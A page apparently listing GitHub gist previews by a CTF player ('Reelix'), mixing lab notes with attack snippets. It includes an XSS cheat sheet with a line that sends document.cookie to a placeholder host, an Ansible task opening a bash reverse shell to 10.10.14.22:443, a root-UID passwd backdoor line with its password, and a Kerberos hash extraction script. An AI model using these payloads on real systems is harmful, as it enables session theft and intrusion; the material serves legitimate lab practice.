This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import pyshark | |
from pprint import pprint | |
data = pyshark.FileCapture("C:/Reelix/HTB/Office/Latest-System-Dump-8fbc124d.pcap", display_filter="kerberos") | |
print("Searching for Kerberos packets...") | |
for pkt in data: | |
if "Kerberos" in pkt: | |
dirs = dir(pkt["Kerberos"]) | |
if ("cnamestring" in dirs) and ("cipher" in dirs) and ("etype" in dirs) and ("realm" in dirs): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Test For Image | |
<img src='http://ip:port/xss' /> | |
// Test For Fetch | |
<img src=x onerror=fetch('http://ip:port/xss2') /> | |
// Fetch Cookie Stealing | |
<img src=x onerror=fetch('http://ip:port/cookie?cookie='+btoa(document.cookie)) /> | |
// Fetch entire page contents |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System.Net; | |
using System.Net.Sockets; | |
using System.Text; | |
namespace ConsoleApp1 | |
{ | |
internal class Program | |
{ | |
static void Main(string[] args) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>alert('Reelix');</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- hosts: localhost | |
tasks: | |
- name: rev | |
shell: bash -c 'bash -i >& /dev/tcp/10.10.14.22/443 0>&1' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://shamsher-khan.medium.com/broker-tryhackme-writeup-93202a3f778 | |
# https://pypi.org/project/paho-mqtt/#client | |
import paho.mqtt.client as mqtt | |
import threading | |
import sys | |
import ipaddress | |
IP = "" | |
try: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
reelix:$1$Nq8UgW36$58WHg7G1iMta.ckiAUXVg0:0:0:root:/root:/bin/bash | |
Pass: reelix |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1.) sudo nano /etc/iptables/rules.v4 | |
2.) sudo su | |
3.) iptables-restore < /etc/iptables/rules.v4 | |
4.) exit # su | |
5.) sudo iptables -L INPUT # Verify your rule is there - Might have a name instea of the port | |
6.) Sign into https://cloud.oracle.com/ | |
7.) Search for "security lists" and click the link on the left |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
static void Main(string[] args) | |
{ | |
Console.WriteLine("Input path to numerical ciphertext."); | |
string path = Console.ReadLine(); | |
string input = File.ReadAllText(path); | |
int[] intList = input.Split(' ').Select(int.Parse).ToArray(); | |
int intListLength = intList.Length; | |
StringBuilder final = new StringBuilder(); | |
for (int n = 1; n < 100000; n++) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0.) Update: https://www.volatilityfoundation.org/releases | |
1.) General analysis (Mainly used to get Profiles) | |
- volatility.exe -f file.raw imageinfo | |
Eg: Suggested Profile(s) : Win7SP1x64, WinXPSP2x86, WinXPSP3x86 | |
2.) List Processes | |
- volatility.exe -f file.raw --profile=ProfileFromAbove pslist |
NewerOlder